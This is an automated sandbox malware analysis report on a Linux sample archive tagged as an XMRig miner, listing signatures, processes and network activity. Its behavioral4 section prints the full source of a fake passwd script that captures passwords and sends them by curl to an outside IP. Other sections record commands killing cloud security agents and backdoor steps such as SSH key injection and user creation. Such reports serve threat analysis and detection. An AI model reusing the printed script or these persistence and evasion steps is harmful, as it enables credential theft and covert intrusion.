Malware Analysis Report

2025-01-02 07:04

Sample ID 241127-ghggwszqes
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
miner xmrig discovery antivm credential_access defense_evasion execution persistence privilege_escalatio privilege_escalation xmrig_linux
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

miner xmrig discovery antivm credential_access defense_evasion execution persistence privilege_escalatio privilege_escalation xmrig_linux

Xmrig_linux family

Xmrig family

XMRig Miner payload

xmrig

Adds new SSH keys

Modifies password files for system users/ groups

OS Credential Dumping

Modifies PAM framework files

File and Directory Permissions Modification

Checks mountinfo of local process

Checks hardware identifiers (DMI)

Write file to user bin folder

Creates/modifies Cron job

Attempts to change immutable files

Modifies special file permissions

Adds a user to the system

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads hardware information

Enumerates running processes

Deletes log files

Reads process memory

Checks CPU configuration

Reads CPU attributes

Changes its process name

System Network Configuration Discovery

Reads runtime system information

System Information Discovery

Enumerates kernel/hardware configuration

Software Deployment Tools

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-27 05:48

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 45.10.20.100:1010 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.81:80 security.ubuntu.com tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/131/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/654/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/301/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/104/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/107/stat /usr/bin/killall N/A
File opened for reading /proc/131/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/273/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/338/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/206/stat /usr/bin/killall N/A
File opened for reading /proc/338/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/268/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/648/cmdline /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/206/stat /usr/bin/killall N/A
File opened for reading /proc/312/stat /usr/bin/killall N/A
File opened for reading /proc/136/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/649/cmdline /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/301/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/271/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/271/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/690/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

3s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

Country Destination Domain Proto
US 151.101.1.91:443 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

130s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/bin/perl N/A
File opened for reading /etc/shadow /usr/share/debconf/frontend N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/967/maps /usr/sbin/needrestart N/A
File opened for reading /proc/979/maps /usr/sbin/needrestart N/A
File opened for reading /proc/987/maps /usr/sbin/needrestart N/A
File opened for reading /proc/528/maps /usr/sbin/needrestart N/A
File opened for reading /proc/611/maps /usr/sbin/needrestart N/A
File opened for reading /proc/738/maps /usr/sbin/needrestart N/A
File opened for reading /proc/796/maps /usr/sbin/needrestart N/A
File opened for reading /proc/843/maps /usr/sbin/needrestart N/A
File opened for reading /proc/417/maps /usr/sbin/needrestart N/A
File opened for reading /proc/426/maps /usr/sbin/needrestart N/A
File opened for reading /proc/587/maps /usr/sbin/needrestart N/A
File opened for reading /proc/732/maps /usr/sbin/needrestart N/A
File opened for reading /proc/839/maps /usr/sbin/needrestart N/A
File opened for reading /proc/986/maps /usr/sbin/needrestart N/A
File opened for reading /proc/451/maps /usr/sbin/needrestart N/A
File opened for reading /proc/635/maps /usr/sbin/needrestart N/A
File opened for reading /proc/636/maps /usr/sbin/needrestart N/A
File opened for reading /proc/741/maps /usr/sbin/needrestart N/A
File opened for reading /proc/942/maps /usr/sbin/needrestart N/A
File opened for reading /proc/589/maps /usr/sbin/needrestart N/A
File opened for reading /proc/608/maps /usr/sbin/needrestart N/A
File opened for reading /proc/759/maps /usr/sbin/needrestart N/A
File opened for reading /proc/780/maps /usr/sbin/needrestart N/A
File opened for reading /proc/948/maps /usr/sbin/needrestart N/A
File opened for reading /proc/377/maps /usr/sbin/needrestart N/A
File opened for reading /proc/588/maps /usr/sbin/needrestart N/A
File opened for reading /proc/613/maps /usr/sbin/needrestart N/A
File opened for reading /proc/634/maps /usr/sbin/needrestart N/A
File opened for reading /proc/749/maps /usr/sbin/needrestart N/A
File opened for reading /proc/778/maps /usr/sbin/needrestart N/A
File opened for reading /proc/794/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/530/maps /usr/sbin/needrestart N/A
File opened for reading /proc/593/maps /usr/sbin/needrestart N/A
File opened for reading /proc/658/maps /usr/sbin/needrestart N/A
File opened for reading /proc/680/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/585/maps /usr/sbin/needrestart N/A
File opened for reading /proc/632/maps /usr/sbin/needrestart N/A
File opened for reading /proc/674/maps /usr/sbin/needrestart N/A
File opened for reading /proc/707/maps /usr/sbin/needrestart N/A
File opened for reading /proc/728/maps /usr/sbin/needrestart N/A
File opened for reading /proc/637/maps /usr/sbin/needrestart N/A
File opened for reading /proc/768/maps /usr/sbin/needrestart N/A
File opened for reading /proc/789/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/201/status /usr/bin/pkill N/A
File opened for reading /proc/1571/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1052/status /usr/sbin/needrestart N/A
File opened for reading /proc/1487/maps /usr/sbin/needrestart N/A
File opened for reading /proc/707/cmdline /usr/bin/pkill N/A
File opened for reading /proc/728/cmdline /usr/bin/pkill N/A
File opened for reading /proc/986/cmdline /usr/bin/pkill N/A
File opened for reading /proc/90/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1187/stat /usr/sbin/needrestart N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/systemd-detect-virt N/A
File opened for reading /proc/588/cmdline /usr/bin/pkill N/A
File opened for reading /proc/505/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/sbin/needrestart N/A
File opened for reading /proc/942/status /usr/sbin/needrestart N/A
File opened for reading /proc/1275/status /usr/sbin/needrestart N/A
File opened for reading /proc/789/status /usr/sbin/needrestart N/A
File opened for reading /proc/89/status /usr/bin/pkill N/A
File opened for reading /proc/163/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1242/cmdline /usr/bin/pkill N/A
File opened for reading /proc/92/cmdline /usr/bin/pkill N/A
File opened for reading /proc/761/status /usr/bin/pkill N/A
File opened for reading /proc/94/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1186/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/680/cmdline /usr/bin/pkill N/A
File opened for reading /proc/114/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/17/status /usr/sbin/needrestart N/A
File opened for reading /proc/1154/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1435/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1052/cmdline /usr/bin/pkill N/A
File opened for reading /proc/741/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1575/stat /usr/sbin/needrestart N/A
File opened for reading /proc/98/status /usr/bin/pkill N/A
File opened for reading /proc/214/status /usr/bin/pkill N/A
File opened for reading /proc/417/cmdline /usr/bin/pkill N/A
File opened for reading /proc/80/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1139/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/528/stat /usr/sbin/needrestart N/A
File opened for reading /proc/608/root/usr/lib/python3.10/posixpath.py /usr/sbin/needrestart N/A
File opened for reading /proc/14/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1171/stat /usr/sbin/needrestart N/A
File opened for reading /proc/101/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1640/status /usr/sbin/needrestart N/A
File opened for reading /proc/1358/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1162/status /usr/sbin/needrestart N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/203/status /usr/bin/pkill N/A
File opened for reading /proc/1061/status /usr/bin/pkill N/A
File opened for reading /proc/1307/stat /usr/sbin/needrestart N/A
File opened for reading /proc/585/status /usr/sbin/needrestart N/A
File opened for reading /proc/1107/status /usr/sbin/needrestart N/A
File opened for reading /proc/608/root/usr/lib/python3.10/encodings/aliases.py /usr/sbin/needrestart N/A
File opened for reading /proc/1275/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1307/status /usr/bin/pkill N/A
File opened for reading /proc/314/cmdline /usr/bin/pkill N/A
File opened for reading /proc/414/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/stat /usr/sbin/needrestart N/A
File opened for reading /proc/707/root/usr/lib/python3.10/hashlib.py /usr/sbin/needrestart N/A
File opened for reading /proc/119/cmdline /usr/bin/pkill N/A
File opened for reading /proc/426/status /usr/bin/pkill N/A
File opened for reading /proc/1032/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1139/status /usr/bin/pkill N/A
File opened for reading /proc/1173/environ /usr/sbin/needrestart N/A
File opened for reading /proc/85/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A

System Information Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]
